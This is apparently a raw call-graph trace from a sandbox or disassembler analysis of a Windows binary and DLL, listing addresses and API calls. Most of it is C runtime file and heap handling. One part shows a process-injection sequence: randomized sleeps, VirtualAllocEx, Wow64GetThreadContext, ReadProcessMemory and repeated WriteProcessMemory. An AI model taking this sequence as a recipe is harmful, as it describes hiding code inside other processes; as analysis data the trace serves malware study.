GetSystemInfo 110739->110741 110742 d15f11 GetProcAddress 110740->110742 110743 d15f4d GetSystemInfo 110740->110743 110742->110743 110747 d15f21 GetNativeSystemInfo 110742->110747 110744 d15f27 110743->110744 110748 d1109d 110744->110748 110749 d15f2b FreeLibrary 110744->110749 110745->110737 110746 d550ad 110745->110746 110747->110744 110750 d30433 29 API calls __onexit 110748->110750 110749->110748 110750->110729 110752 d184c7 _wcslen 110751->110752 110753 d565bb 110751->110753 110756 d18502 110752->110756 110757 d184dd 110752->110757 110754 d196d9 8 API calls 110753->110754 110755 d565c4 110754->110755 110755->110755 110759 d3016b 8 API calls 110756->110759 110771 d18894 8 API calls 110757->110771 110761 d1850e 110759->110761 110760 d184e5 __fread_nolock 110760->110734 110762 d3019b 8 API calls 110761->110762 110762->110760 110764 d196e7 110763->110764 110766 d196f0 __fread_nolock 110763->110766 110764->110766 110772 d1c269 110764->110772 110766->110736 110768 d179fb 110767->110768 110769 d196d9 8 API calls 110768->110769 110770 d17a0f 110769->110770 110770->110745 110771->110760 110773 d1c27c 110772->110773 110777 d1c279 __fread_nolock 110772->110777 110774 d3016b 8 API calls 110773->110774 110775 d1c287 110774->110775 110776 d3019b 8 API calls 110775->110776 110776->110777 110777->110766 110778 d1105b 110783 d1522e 110778->110783 110780 d1106a 110814 d30433 29 API calls __onexit 110780->110814 110782 d11074 110784 d1523e __wsopen_s 110783->110784 110785 d1bf07 8 API calls 110784->110785 110786 d152f4 110785->110786 110815 d1551b 110786->110815 110788 d152fd 110822 d151bf 110788->110822 110795 d1bf07 8 API calls 110796 d1532e 110795->110796 110843 d1bceb 110796->110843 110799 d54bc0 RegQueryValueExW 110800 d54c56 RegCloseKey 110799->110800 110801 d54bdd 110799->110801 110804 d15359 110800->110804 110812 d54c68 _wcslen 110800->110812 110802 d3019b 8 API calls 110801->110802 110803 d54bf6 110802->110803 110849 d141a6 110803->110849 110804->110780 110807 d54c1e 110808 d184b7 8 API calls 110807->110808 110809 d54c38 ISource 110808->110809 110809->110800 110811 d1684e 8 API calls 110811->110812 110812->110804 110812->110811 110813 d1627c 8 API calls 110812->110813 110852 d1b25f 110812->110852 110813->110812 110814->110782 110858 d522f0 110815->110858 110818 d1b25f 8 API calls 110819 d1554e 110818->110819 110860 d1557e 110819->110860 110821 d15558 110821->110788 110823 d522f0 __wsopen_s 110822->110823 110824 d151cc GetFullPathNameW 110823->110824 110825 d151ee 110824->110825 110826 d184b7 8 API calls 110825->110826 110827 d1520c 110826->110827 110828 d165a4 110827->110828 110829 d165bb 110828->110829 110830 d55629 110828->110830 110870 d165cc 110829->110870 110832 d3016b 8 API calls 110830->110832 110834 d55633 _wcslen 110832->110834 110833 d15316 110837 d1684e 110833->110837 110835 d3019b 8 API calls 110834->110835 110836 d5566c __fread_nolock 110835->110836 110839 d1685d 110837->110839 110842 d1687e __fread_nolock 110837->110842 110838 d3016b 8 API calls 110841 d15325 110838->110841 110840 d3019b 8 API calls 110839->110840 110840->110842 110841->110795 110842->110838 110844 d1bd05 110843->110844 110848 d15337 RegOpenKeyExW 110843->110848 110845 d3016b 8 API calls 110844->110845 110846 d1bd0f 110845->110846 110847 d3019b 8 API calls 110846->110847 110847->110848 110848->110799 110848->110804 110850 d3016b 8 API calls 110849->110850 110851 d141b8 RegQueryValueExW 110850->110851 110851->110807 110851->110809 110853 d1b26e _wcslen 110852->110853 110854 d3019b 8 API calls 110853->110854 110855 d1b296 __fread_nolock 110854->110855 110856 d3016b 8 API calls 110855->110856 110857 d1b2ac 110856->110857 110857->110812 110859 d15528 GetModuleFileNameW 110858->110859 110859->110818 110861 d522f0 __wsopen_s 110860->110861 110862 d1558b GetFullPathNameW 110861->110862 110863 d155c5 110862->110863 110864 d155aa 110862->110864 110866 d1bceb 8 API calls 110863->110866 110865 d184b7 8 API calls 110864->110865 110867 d155b6 110865->110867 110866->110867 110868 d179ed 8 API calls 110867->110868 110869 d155c2 110868->110869 110869->110821 110871 d165dc _wcslen 110870->110871 110872 d5568b 110871->110872 110873 d165ef 110871->110873 110875 d3016b 8 API calls 110872->110875 110880 d17cb3 110873->110880 110876 d55695 110875->110876 110878 d3019b 8 API calls 110876->110878 110877 d165fc __fread_nolock 110877->110833 110879 d556c5 __fread_nolock 110878->110879 110881 d17cc9 110880->110881 110884 d17cc4 __fread_nolock 110880->110884 110882 d3019b 8 API calls 110881->110882 110883 d564be 110881->110883 110882->110884 110883->110883 110884->110877 112936 d1367c 112939 d13696 112936->112939 112940 d136ad 112939->112940 112941 d13711 112940->112941 112942 d136b2 112940->112942 112978 d1370f 112940->112978 112944 d13717 112941->112944 112945 d53dce 112941->112945 112946 d1378b PostQuitMessage 112942->112946 112947 d136bf 112942->112947 112943 d136f6 DefWindowProcW 112981 d13690 112943->112981 112948 d13743 SetTimer RegisterWindowMessageW 112944->112948 112949 d1371e 112944->112949 112994 d12f24 10 API calls 112945->112994 112946->112981 112950 d136ca 112947->112950 112951 d53e3b 112947->112951 112955 d1376c CreatePopupMenu 112948->112955 112948->112981 112953 d13727 KillTimer 112949->112953 112954 d53d6f 112949->112954 112956 d13795 112950->112956 112957 d136d4 112950->112957 112997 d7c80c 65 API calls ___scrt_fastfail 112951->112997 112962 d1388e Shell_NotifyIconW 112953->112962 112960 d53d74 112954->112960 112961 d53daa MoveWindow 112954->112961 112955->112981 112984 d2fcbb 112956->112984 112963 d53e20 112957->112963 112964 d136df 112957->112964 112959 d53def 112995 d2f1c6 40 API calls 112959->112995 112968 d53d99 SetFocus 112960->112968 112969 d53d7a 112960->112969 112961->112981 112970 d1373a 112962->112970 112963->112943 112996 d71367 8 API calls 112963->112996 112971 d13779 112964->112971 112976 d136ea 112964->112976 112965 d53e4d 112965->112943 112965->112981 112968->112981 112972 d53d83 112969->112972 112969->112976 112991 d1572c DeleteObject DestroyWindow 112970->112991 112992 d137a6 75 API calls ___scrt_fastfail 112971->112992 112993 d12f24 10 API calls 112972->112993 112976->112943 112980 d1388e Shell_NotifyIconW 112976->112980 112978->112943 112979 d13789 112979->112981 112982 d53e14 112980->112982 112983 d138f2 60 API calls 112982->112983 112983->112978 112985 d2fcd3 ___scrt_fastfail 112984->112985 112986 d2fd59 112984->112986 112987 d15f59 55 API calls 112985->112987 112986->112981 112988 d2fcfa 112987->112988 112989 d2fd42 KillTimer SetTimer 112988->112989 112990 d6fdcb Shell_NotifyIconW 112988->112990 112989->112986 112990->112989 112991->112981 112992->112979 112993->112981 112994->112959 112995->112976 112996->112978 112997->112965 112998 100022b0 FindFirstFileW 112999 10002301 FindFirstFileW 112998->112999 113000 100022e2 112998->113000 113002 10002382 112999->113002 113003 10002319 112999->113003 113054 10004bdd 113000->113054 113005 10004bdd __wcstombs_l_helper 6 API calls 113002->113005 113006 10002322 113003->113006 113007 1000233a FindFirstFileW 113003->113007 113004 100022fd 113009 10002396 113005->113009 113010 10004bdd __wcstombs_l_helper 6 API calls 113006->113010 113007->113002 113008 1000234b 113007->113008 113011 10002354 113008->113011 113012 1000236c 113008->113012 113013 10002336 113010->113013 113014 10004bdd __wcstombs_l_helper 6 API calls 113011->113014 113019 10003a90 113012->113019 113016 10002368 113014->113016 113017 1000237d 113035 10001cb0 113017->113035 113020 10003af5 113019->113020 113025 10003a9e 113019->113025 113021 10003b7c 113020->113021 113022 10003afe 113020->113022 113064 10004705 71 API calls 2 library calls 113021->113064 113028 10003b10 _memmove 113022->113028 113063 10003d80 71 API calls 3 library calls 113022->113063 113025->113020 113027 10003ac4 113025->113027 113029 10003ac9 113027->113029 113030 10003adf 113027->113030 113028->113017 113061 10003c50 71 API calls _memmove 113029->113061 113062 10003c50 71 API calls _memmove 113030->113062 113033 10003ad9 113033->113017 113034 10003aef 113034->113017 113065 10001b50 113035->113065 113037 10001cc4 std::ios_base::_Ios_base_dtor 113038 10002740 190 API calls 113037->113038 113045 10006aa1 108 API calls __fcloseall 113037->113045 113048 100037a0 106 API calls 113037->113048 113049 100022a0 113037->113049 113053 10001eb9 113037->113053 113080 10001950 113037->113080 113099 10006275 113037->113099 113102 10001c10 190 API calls std::ios_base::_Ios_base_dtor 113037->113102 113038->113037 113043 10006275 _rand 70 API calls 113044 10001ed5 Sleep 113043->113044 113044->113037 113044->113053 113045->113037 113046 10006275 _rand 70 API calls 113047 100020a5 Sleep 113046->113047 113047->113037 113047->113053 113048->113037 113049->113002 113050 10001950 88 API calls 113050->113053 113051 10006275 _rand 70 API calls 113052 10002275 Sleep 113051->113052 113052->113049 113052->113053 113053->113037 113053->113043 113053->113046 113053->113050 113053->113051 113055 10004be5 113054->113055 113056 10004be7 IsProcessorFeaturePresent 113054->113056 113055->113004 113058 1000a56b 113056->113058 113950 1000a51a 5 API calls 2 library calls 113058->113950 113060 1000a64e 113060->113004 113061->113033 113062->113034 113063->113028 113103 10005ee6 113065->113103 113069 10001b88 113119 10006874 113069->113119 113071 10001b8e 113132 10005652 113071->113132 113074 1000696b _fseek 108 API calls 113075 10001bad 113074->113075 113149 100061c9 113075->113149 113079 10001bf7 113079->113037 113081 10001b3b 113080->113081 113082 1000196e 113080->113082 113081->113037 113083 10006275 _rand 70 API calls 113082->113083 113084 10001973 Sleep 113083->113084 113922 10008700 113084->113922 113087 100019ca 113088 10006275 _rand 70 API calls 113087->113088 113089 100019cf Sleep VirtualAlloc Wow64GetThreadContext 113088->113089 113089->113081 113090 10001a12 ReadProcessMemory VirtualAllocEx WriteProcessMemory 113089->113090 113091 10001a65 113090->113091 113092 10001aa8 WriteProcessMemory 113090->113092 113093 10001a67 WriteProcessMemory 113091->113093 113094 10006275 _rand 70 API calls 113092->113094 113093->113093 113924 1000d95e 113099->113924 113102->113037 113165 10005e22 113103->113165 113105 10001b79 113106 1000696b 113105->113106 113108 10006977 _ungetc 113106->113108 113107 10006985 113509 10008911 70 API calls __getptd_noexit 113107->113509 113108->113107 113110 100069ab 113108->113110 113491 1000557c 113110->113491 113112 1000698a 113510 1000a885 9 API calls _ungetc 113112->113510 113118 10006995 _ungetc 113118->113069 113120 10006880 _ungetc 113119->113120 113121 100068a3 113120->113121 113122 1000688e 113120->113122 113124 1000557c __lock_file 71 API calls 113121->113124 113640 10008911 70 API calls __getptd_noexit 113122->113640 113125 100068a9 113124->113125 113127 1000651b __ftell_nolock 79 API calls 113125->113127 113126 10006893 113641 1000a885 9 API calls _ungetc 113126->113641 113129 100068b4 113127->113129 113642 100068d4 LeaveCriticalSection LeaveCriticalSection _setvbuf 113129->113642 113131 1000689e _ungetc 113131->113071 113133 100056cd 113132->113133 113137 1000565e 113132->113137 113649 1000b662 DecodePointer 113133->113649 113135 100056d3 113650 10008911 70 API calls __getptd_noexit 113135->113650 113136 10005669 113136->113137 113643 1000b695 70 API calls __NMSG_WRITE 113136->113643 113644 1000b6f2 70 API calls 6 library calls 113136->113644 113645 1000b2c2 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 113136->113645 113137->113136 113140 10005691 RtlAllocateHeap 113137->113140 113143 100056b9 113137->113143 113147 100056b7 113137->113147 113646 1000b662 DecodePointer 113137->113646 113140->113137 113142 10001ba1 113140->113142 113142->113074 113647 10008911 70 API calls __getptd_noexit 113143->113647 113648 10008911 70 API calls __getptd_noexit 113147->113648 113651 100061e4 113149->113651 113151 10001bb8 113152 10006aa1 113151->113152 113153 10006aad _ungetc 113152->113153 113154 10006ac1 113153->113154 113155 10006ad9 113153->113155 113878 10008911 70 API calls __getptd_noexit 113154->113878 113158 1000557c __lock_file 71 API calls 113155->113158 113162 10006ad1 _ungetc 113155->113162 113157 10006ac6 113879 1000a885 9 API calls _ungetc 113157->113879 113159 10006aeb 113158->113159 113862 10006a35 113159->113862 113162->113079 113168 10005e2e _ungetc 113165->113168 113166 10005e40 113215 10008911 70 API calls __getptd_noexit 113166->113215 113168->113166 113170 10005e6d 113168->113170 113169 10005e45 113216 1000a885 9 API calls _ungetc 113169->113216 113184 1000ca24 113170->113184 113173 10005e72 113174 10005e88 113173->113174 113175 10005e7b 113173->113175 113176 10005eb1 113174->113176 113177 10005e91 113174->113177 113217 10008911 70 API calls __getptd_noexit 113175->113217 113198 1000cb3c 113176->113198 113218 10008911 70 API calls __getptd_noexit 113177->113218 113181 10005e50 _ungetc @_EH4_CallFilterFunc@8 113181->113105 113185 1000ca30 _ungetc 113184->113185 113220 10007b9e 113185->113220 113187 1000caae 113227 1000cb33 113187->113227 113188 1000cab5 113256 10008607 70 API calls _malloc 113188->113256 113191 1000cabc 113191->113187 113194 1000cacb InitializeCriticalSectionAndSpinCount EnterCriticalSection 113191->113194 113192 1000ca3e 113192->113187 113192->113188 113230 10007c26 113192->113230 113254 100055bb 71 API calls __lock 113192->113254 113255 10005625 LeaveCriticalSection LeaveCriticalSection _doexit 113192->113255 113193 1000cb28 _ungetc 113193->113173 113194->113187 113207 1000cb59 113198->113207 113199 1000cb6d 113269 10008911 70 API calls __getptd_noexit 113199->113269 113201 1000cd14 113201->113199 113204 1000cd70 113201->113204 113202 1000cb72 113270 1000a885 9 API calls _ungetc 113202->113270 113266 10013e04 113204->113266 113205 10005ebc 113219 10005ede LeaveCriticalSection LeaveCriticalSection _setvbuf 113205->113219 113207->113199 113207->113201 113271 10013e22 80 API calls __mbsnbcmp_l 113207->113271 113209 1000ccda 113209->113199 113272 10013f4f 87 API calls __mbsnbicmp_l 113209->113272 113211 1000cd0d 113211->113201 113273 10013f4f 87 API calls __mbsnbicmp_l 113211->113273 113213 1000cd2c 113213->113201 113274 10013f4f 87 API calls __mbsnbicmp_l 113213->113274 113215->113169 113216->113181 113217->113181 113218->113181 113219->113181 113221 10007bc2 EnterCriticalSection 113220->113221 113222 10007baf 113220->113222 113221->113192 113223 10007c26 __mtinitlocknum 69 API calls 113222->113223 113224 10007bb5 113223->113224 113224->113221 113257 1000b3df 70 API calls 3 library calls 113224->113257 113258 10007d02 LeaveCriticalSection 113227->113258 113229 1000cb3a 113229->113193 113231 10007c32 _ungetc 113230->113231 113232 10007c53 113231->113232 113233 10007c3b 113231->113233 113235 10007c51 113232->113235 113241 10007cbb _ungetc 113232->113241 113259 1000b695 70 API calls __NMSG_WRITE 113233->113259 113235->113232 113262 10008607 70 API calls _malloc 113235->113262 113236 10007c40 113260 1000b6f2 70 API calls 6 library calls 113236->113260 113239 10007c67 113242 10007c7d 113239->113242 113243 10007c6e 113239->113243 113240 10007c47 113261 1000b2c2 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 113240->113261 113241->113192 113244 10007b9e __lock 69 API calls 113242->113244 113263 10008911 70 API calls __getptd_noexit 113243->113263 113247 10007c84 113244->113247 113249 10007c93 InitializeCriticalSectionAndSpinCount 113247->113249 113250 10007ca8 113247->113250 113248 10007c73 113248->113241 113252 10007cae 113249->113252 113264 100054a4 70 API calls 2 library calls 113250->113264 113265 10007cc4 LeaveCriticalSection _doexit 113252->113265 113254->113192 113255->113192 113256->113191 113258->113229 113259->113236 113260->113240 113262->113239 113263->113248 113264->113252 113265->113241 113275 10013cf1 113266->113275 113268 10013e1d 113268->113205 113269->113202 113270->113205 113271->113209 113272->113211 113273->113213 113274->113201 113278 10013cfd _ungetc 113275->113278 113276 10013d0f 113294 10008911 70 API calls __getptd_noexit 113276->113294 113278->113276 113280 10013d46 113278->113280 113279 10013d14 113295 1000a885 9 API calls _ungetc 113279->113295 113286 10013db8 113280->113286 113283 10013d63 113296 10013d8c LeaveCriticalSection __unlock_fhandle 113283->113296 113285 10013d1e _ungetc 113285->113268 113297 1000b1e0 113286->113297 113289 10013dd2 113289->113283 113293 10013dfc 113293->113283 113294->113279 113295->113285 113296->113285 113298 1000b203 113297->113298 113299 1000b1ed 113297->113299 113298->113299 113301 1000b20a 113298->113301 113400 10008911 70 API calls __getptd_noexit 113299->113400 113402 1000e678 113301->113402 113302 1000b1f2 113401 1000a885 9 API calls _ungetc 113302->113401 113306 1000b220 MultiByteToWideChar 113309 1000b23a GetLastError 113306->113309 113310 1000b24b 113306->113310 113307 1000b213 AreFileApisANSI 113307->113306 113308 1000b21d 113307->113308 113308->113306 113406 100088f0 70 API calls 3 library calls 113309->113406 113407 10008607 70 API calls _malloc 113310->113407 113313 1000b253 113314 1000b1fc 113313->113314 113315 1000b25a MultiByteToWideChar 113313->113315 113314->113289 113321 10015ffe 113314->113321 113316 1000b270 GetLastError 113315->113316 113317 1000b283 113315->113317 113408 100088f0 70 API calls 3 library calls 113316->113408 113317->113314 113319 1000b27c 113409 100054a4 70 API calls 2 library calls 113319->113409 113410 1000aa40 InitOnceExecuteOnce 113321->113410 113323 1001601c 113324 10016020 GetLastError 113323->113324 113325 1001603f 113323->113325 113449 100088f0 70 API calls 3 library calls 113324->113449 113411 10017704 113325->113411 113327 10016032 113450 10008911 70 API calls __getptd_noexit 113327->113450 113330 10013df2 113399 100054a4 70 API calls 2 library calls 113330->113399 113332 10016776 113333 10016061 113334 1001609c 113333->113334 113337 100160bf 113333->113337 113347 10016199 113333->113347 113451 100088dd 70 API calls __getptd_noexit 113334->113451 113336 100160a1 113452 10008911 70 API calls __getptd_noexit 113336->113452 113340 1001617d 113337->113340 113348 1001615b 113337->113348 113339 100160ae 113453 1000a885 9 API calls _ungetc 113339->113453 113454 100088dd 70 API calls __getptd_noexit 113340->113454 113343 10016182 113455 10008911 70 API calls __getptd_noexit 113343->113455 113345 1001618f 113456 1000a885 9 API calls _ungetc 113345->113456 113490 1000a895 8 API calls 2 library calls 113347->113490 113418 10013856 113348->113418 113350 10016229 113351 10016233 113350->113351 113352 10016254 113350->113352 113457 100088dd 70 API calls __getptd_noexit 113351->113457 113439 10015f6d 113352->113439 113355 10016238 113458 10008911 70 API calls __getptd_noexit 113355->113458 113359 10016242 113459 10008911 70 API calls __getptd_noexit 113359->113459 113399->113293 113400->113302 113401->113314 113403 1000e687 GetModuleHandleW GetProcAddress 113402->113403 113404 1000b20f 113402->113404 113405 1000e6a7 113403->113405 113404->113306 113404->113307 113405->113404 113406->113314 113407->113313 113408->113319 113409->113317 113410->113323 113412 10017723 113411->113412 113413 1001770e 113411->113413 113412->113333 113414 10008911 _ungetc 70 API calls 113413->113414 113415 10017713 113414->113415 113416 1000a885 _ungetc 9 API calls 113415->113416 113417 1001771e 113416->113417 113417->113333 113419 10013862 _ungetc 113418->113419 113420 10007c26 __mtinitlocknum 70 API calls 113419->113420 113421 10013873 113420->113421 113422 1000aa40 __ioinit InitOnceExecuteOnce 113421->113422 113428 10013878 _ungetc 113421->113428 113423 10013885 113422->113423 113424 10007b9e __lock 70 API calls 113423->113424 113423->113428 113436 10013890 113424->113436 113425 100139e5 113426 100139fc __alloc_osfhnd LeaveCriticalSection 113425->113426 113426->113428 113427 1001396c 113429 100085bd __calloc_crt 70 API calls 113427->113429 113428->113350 113433 10013975 113429->113433 113430 1001390c EnterCriticalSection 113432 1001391c LeaveCriticalSection 113430->113432 113430->113436 113431 10007b9e __lock 70 API calls 113431->113436 113432->113436 113433->113425 113434 100137ca ___lock_fhandle 72 API calls 113433->113434 113438 100139da 113434->113438 113435 100138ea InitializeCriticalSectionAndSpinCount 113435->113436 113436->113425 113436->113427 113436->113430 113436->113431 113436->113435 113437 10013934 __alloc_osfhnd LeaveCriticalSection 113436->113437 113437->113436 113438->113425 113440 1000e678 ___crtIsPackagedApp GetModuleHandleW GetProcAddress 113439->113440 113441 10015f79 113440->113441 113442 10015f7d GetModuleHandleW GetProcAddress 113441->113442 113443 10015f9f 113441->113443 113442->113443 113444 10015f9a 113442->113444 113446 1000e678 ___crtIsPackagedApp GetModuleHandleW GetProcAddress 113443->113446 113445 10015fae 113444->113445 113447 10015fa7 113446->113447 113447->113445 113449->113327 113450->113330 113451->113336 113452->113339 113453->113330 113454->113343 113455->113345 113456->113347 113457->113355 113458->113359 113459->113330 113490->113332 113492 1000558c 113491->113492 113493 100055ae EnterCriticalSection 113491->113493 113492->113493 113495 10005594 113492->113495 113494 100055a4 113493->113494 113497 100068dc 113494->113497 113496 10007b9e __lock 70 API calls 113495->113496 113496->113494 113498 100068fa 113497->113498 113499 100068ea 113497->113499 113501 10006910 113498->113501 113553 1000651b 113498->113553 113552 10008911 70 API calls __getptd_noexit 113499->113552 113512 10005a07 113501->113512 113502 100068ef 113511 100069e2 LeaveCriticalSection LeaveCriticalSection _setvbuf 113502->113511 113507 10006951 113525 1000dd08 113507->113525 113509->113112 113510->113118 113511->113118 113513 10005a3e 113512->113513 113514 10005a1a 113512->113514 113518 1000aa1c 113513->113518 113514->113513 113515 1000aa1c __fclose_nolock 70 API calls 113514->113515 113516 10005a37 113515->113516 113582 1000bf8c 103 API calls 6 library calls 113516->113582 113519 1000aa26 113518->113519 113520 1000aa3b 113518->113520 113583 10008911 70 API calls __getptd_noexit 113519->113583 113520->113507 113522 1000aa2b 113584 1000a885 9 API calls _ungetc 113522->113584 113524 1000aa36 113524->113507 113526 1000dd14 _ungetc 113525->113526 113527 1000dd34 113526->113527 113528 1000dd1c 113526->113528 113585 1000aa40 InitOnceExecuteOnce 113527->113585 113605 100088dd 70 API calls __getptd_noexit 113528->113605 113531 1000dd21 113606 10008911 70 API calls __getptd_noexit 113531->113606 113533 1000dd29 _ungetc 113533->113502 113534 1000ddd6 113610 100088dd 70 API calls __getptd_noexit 113534->113610 113536 1000dd39 113536->113533 113536->113534 113538 1000dd73 113536->113538 113537 1000dddb 113611 10008911 70 API calls __getptd_noexit 113537->113611 113586 100137ca 113538->113586 113541 1000dde3 113612 1000a885 9 API calls _ungetc 113541->113612 113542 1000dd79 113544 1000dd8c 113542->113544 113545 1000dd9f 113542->113545 113595 1000ddf7 113544->113595 113607 10008911 70 API calls __getptd_noexit 113545->113607 113548 1000dda4 113608 100088dd 70 API calls __getptd_noexit 113548->113608 113549 1000dd98 113609 1000ddce LeaveCriticalSection __unlock_fhandle 113549->113609 113552->113502 113554 10006528 __ftell_nolock 113553->113554 113555 10006540 113554->113555 113556 10006558 113554->113556 113636 10008911 70 API calls __getptd_noexit 113555->113636 113558 1000aa1c __fclose_nolock 70 API calls 113556->113558 113560 1000655f 113558->113560 113559 10006545 113637 1000a885 9 API calls _ungetc 113559->113637 113562 1000dd08 __write 76 API calls 113560->113562 113563 1000657b 113562->113563 113566 10006765 113563->113566 113567 100065eb 113563->113567 113580 10006550 113563->113580 113564 10004bdd __wcstombs_l_helper 6 API calls 113565 10006872 113564->113565 113565->113501 113568 1000676b 113566->113568 113572 10006710 113566->113572 113570 10006618 113567->113570 113567->113572 113639 10008911 70 API calls __getptd_noexit 113568->113639 113570->113580 113638 1000bd1b 76 API calls 6 library calls 113570->113638 113574 1000dd08 __write 76 API calls 113572->113574 113572->113580 113573 1000664a 113575 10006676 ReadFile 113573->113575 113573->113580 113576 100067cb 113574->113576 113577 1000669c 113575->113577 113575->113580 113578 1000dd08 __write 76 API calls 113576->113578 113576->113580 113579 1000dd08 __write 76 API calls 113577->113579 113578->113580 113581 100066aa 113579->113581 113580->113564 113581->113580 113582->113513 113583->113522 113584->113524 113585->113536 113587 100137d6 _ungetc 113586->113587 113588 10013823 EnterCriticalSection 113587->113588 113589 10007b9e __lock 70 API calls 113587->113589 113590 10013849 _ungetc 113588->113590 113591 100137fa 113589->113591 113590->113542 113592 10013805 InitializeCriticalSectionAndSpinCount 113591->113592 113593 10013817 113591->113593 113592->113593 113613 1001384d LeaveCriticalSection _doexit 113593->113613 113614 10013a8b 113595->113614 113598 1000de1a SetFilePointer 113601 1000de33 GetLastError 113598->113601 113602 1000de3b 113598->113602 113599 1000de0a 113628 10008911 70 API calls __getptd_noexit 113599->113628 113601->113602 113603 1000de0f 113602->113603 113629 100088f0 70 API calls 3 library calls 113602->113629 113603->113549 113605->113531 113606->113533 113607->113548 113608->113549 113609->113533 113610->113537 113611->113541 113612->113533 113613->113588 113615 10013a97 113614->113615 113616 10013aac 113614->113616 113630 100088dd 70 API calls __getptd_noexit 113615->113630 113632 1000aa40 InitOnceExecuteOnce 113616->113632 113619 10013a9c 113631 10008911 70 API calls __getptd_noexit 113619->113631 113621 1000de04 113621->113598 113621->113599 113623 10013ab1 113623->113621 113633 100088dd 70 API calls __getptd_noexit 113623->113633 113624 10013ae4 113634 10008911 70 API calls __getptd_noexit 113624->113634 113626 10013aec 113635 1000a885 9 API calls _ungetc 113626->113635 113628->113603 113629->113603 113630->113619 113631->113621 113632->113623 113633->113624 113634->113626 113635->113621 113636->113559 113637->113580 113638->113573 113639->113580 113640->113126 113641->113131 113642->113131 113643->113136 113644->113136 113646->113137 113647->113147 113648->113142 113649->113135 113650->113142 113652 100061f0 _ungetc 113651->113652 113653 10006233 113652->113653 113654 10006206 _memcpy_s 113652->113654 113655 1000622b _ungetc 113652->113655 113656 1000557c __lock_file 71 API calls 113653->113656 113678 10008911 70 API calls __getptd_noexit 113654->113678 113655->113151 113658 10006239 113656->113658 113664 10006006 113658->113664 113659 10006220 113679 1000a885 9 API calls _ungetc 113659->113679 113665 1000603c 113664->113665 113668 10006021 _memcpy_s 113664->113668 113680 1000626d LeaveCriticalSection LeaveCriticalSection _setvbuf 113665->113680 113666 1000602c 113776 10008911 70 API calls __getptd_noexit 113666->113776 113668->113665 113668->113666 113671 1000607a 113668->113671 113671->113665 113672 1000aa1c __fclose_nolock 70 API calls 113671->113672 113675 1000618b _memcpy_s 113671->113675 113681 1000d057 113671->113681 113754 1000c8c5 113671->113754 113778 100062c7 70 API calls 3 library calls 113671->113778 113672->113671 113779 10008911 70 API calls __getptd_noexit 113675->113779 113677 10006031 113777 1000a885 9 API calls _ungetc 113677->113777 113678->113659 113679->113655 113680->113655 113682 1000d078 113681->113682 113683 1000d08f 113681->113683 113791 100088dd 70 API calls __getptd_noexit 113682->113791 113780 1000aa40 InitOnceExecuteOnce 113683->113780 113686 1000d07d 113792 10008911 70 API calls __getptd_noexit 113686->113792 113688 1000d7d2 113808 100088dd 70 API calls __getptd_noexit 113688->113808 113690 1000d094 113690->113688 113692 1000d0d4 113690->113692 113734 1000d084 113690->113734 113691 1000d7d7 113809 10008911 70 API calls __getptd_noexit 113691->113809 113693 1000d0dc 113692->113693 113699 1000d0f3 113692->113699 113793 100088dd 70 API calls __getptd_noexit 113693->113793 113696 1000d0e8 113810 1000a885 9 API calls _ungetc 113696->113810 113697 1000d0e1 113794 10008911 70 API calls __getptd_noexit 113697->113794 113700 1000d108 113699->113700 113703 1000d122 113699->113703 113704 1000d140 113699->113704 113699->113734 113795 100088dd 70 API calls __getptd_noexit 113700->113795 113703->113700 113707 1000d12d 113703->113707 113796 10008607 70 API calls _malloc 113704->113796 113781 100132c4 113707->113781 113708 1000d150 113710 1000d173 113708->113710 113711 1000d158 113708->113711 113799 1000be24 73 API calls 3 library calls 113710->113799 113797 10008911 70 API calls __getptd_noexit 113711->113797 113714 1000d2ba ReadFile 113717 1000d79a GetLastError 113714->113717 113718 1000d2dc 113714->113718 113716 1000d15d 113798 100088dd 70 API calls __getptd_noexit 113716->113798 113718->113717 113719 1000d257 GetConsoleMode 113724 1000d2b7 113719->113724 113725 1000d26b 113719->113725 113720 1000d181 113720->113707 113724->113714 113725->113724 113726 1000d168 113726->113734 113734->113671 113755 1000c8d0 113754->113755 113756 1000c8e5 113754->113756 113848 10008911 70 API calls __getptd_noexit 113755->113848 113815 1000aa40 InitOnceExecuteOnce 113756->113815 113759 1000c8ea 113762 1000c927 113759->113762 113768 1000c8e0 113759->113768 113850 1000b8ad 70 API calls __malloc_crt 113759->113850 113760 1000c8d5 113849 1000a885 9 API calls _ungetc 113760->113849 113764 1000aa1c __fclose_nolock 70 API calls 113762->113764 113765 1000c93b 113764->113765 113816 1000cf42 113765->113816 113767 1000c942 113767->113768 113768->113671 113776->113677 113777->113665 113778->113671 113779->113677 113780->113690 113782 100132d0 113781->113782 113783 100132dd 113781->113783 113811 10008911 70 API calls __getptd_noexit 113782->113811 113812 1000aa40 InitOnceExecuteOnce 113783->113812 113786 100132e2 113787 1000d241 113786->113787 113813 10008911 70 API calls __getptd_noexit 113786->113813 113787->113714 113787->113719 113789 10013318 113791->113686 113792->113734 113793->113697 113794->113696 113795->113697 113796->113708 113797->113716 113798->113726 113799->113720 113808->113691 113809->113696 113810->113734 113811->113787 113812->113786 113813->113789 113815->113759 113817 1000cf4e _ungetc 113816->113817 113818 1000cf56 113817->113818 113819 1000cf6e 113817->113819 113852 100088dd 70 API calls __getptd_noexit 113818->113852 113851 1000aa40 InitOnceExecuteOnce 113819->113851 113822 1000cf5b 113853 10008911 70 API calls __getptd_noexit 113822->113853 113824 1000d036 113859 100088dd 70 API calls __getptd_noexit 113824->113859 113826 1000cf63 _ungetc 113826->113767 113827 1000cf73 113827->113824 113827->113826 113829 1000cfb1 113827->113829 113831 1000cfd3 113829->113831 113832 1000cfbe 113829->113832 113848->113760 113849->113768 113850->113762 113851->113827 113852->113822 113853->113826 113863 10006a44 113862->113863 113864 10006a58 113862->113864 113910 10008911 70 API calls __getptd_noexit 113863->113910 113867 10006a54 113864->113867 113868 10005a07 __flush 103 API calls 113864->113868 113866 10006a49 113911 1000a885 9 API calls _ungetc 113866->113911 113880 10006b10 LeaveCriticalSection LeaveCriticalSection _setvbuf 113867->113880 113870 10006a64 113868->113870 113881 1000cf12 113870->113881 113873 1000aa1c __fclose_nolock 70 API calls 113874 10006a72 113873->113874 113885 1000df0c 113874->113885 113878->113157 113879->113162 113880->113162 113882 10006a6c 113881->113882 113883 1000cf1f 113881->113883 113882->113873 113883->113882 113913 100054a4 70 API calls 2 library calls 113883->113913 113886 1000df18 _ungetc 113885->113886 113887 1000df20 113886->113887 113888 1000df38 113886->113888 113915 100088dd 70 API calls __getptd_noexit 113887->113915 113914 1000aa40 InitOnceExecuteOnce 113888->113914 113891 1000df25 113895 1000df3d 113910->113866 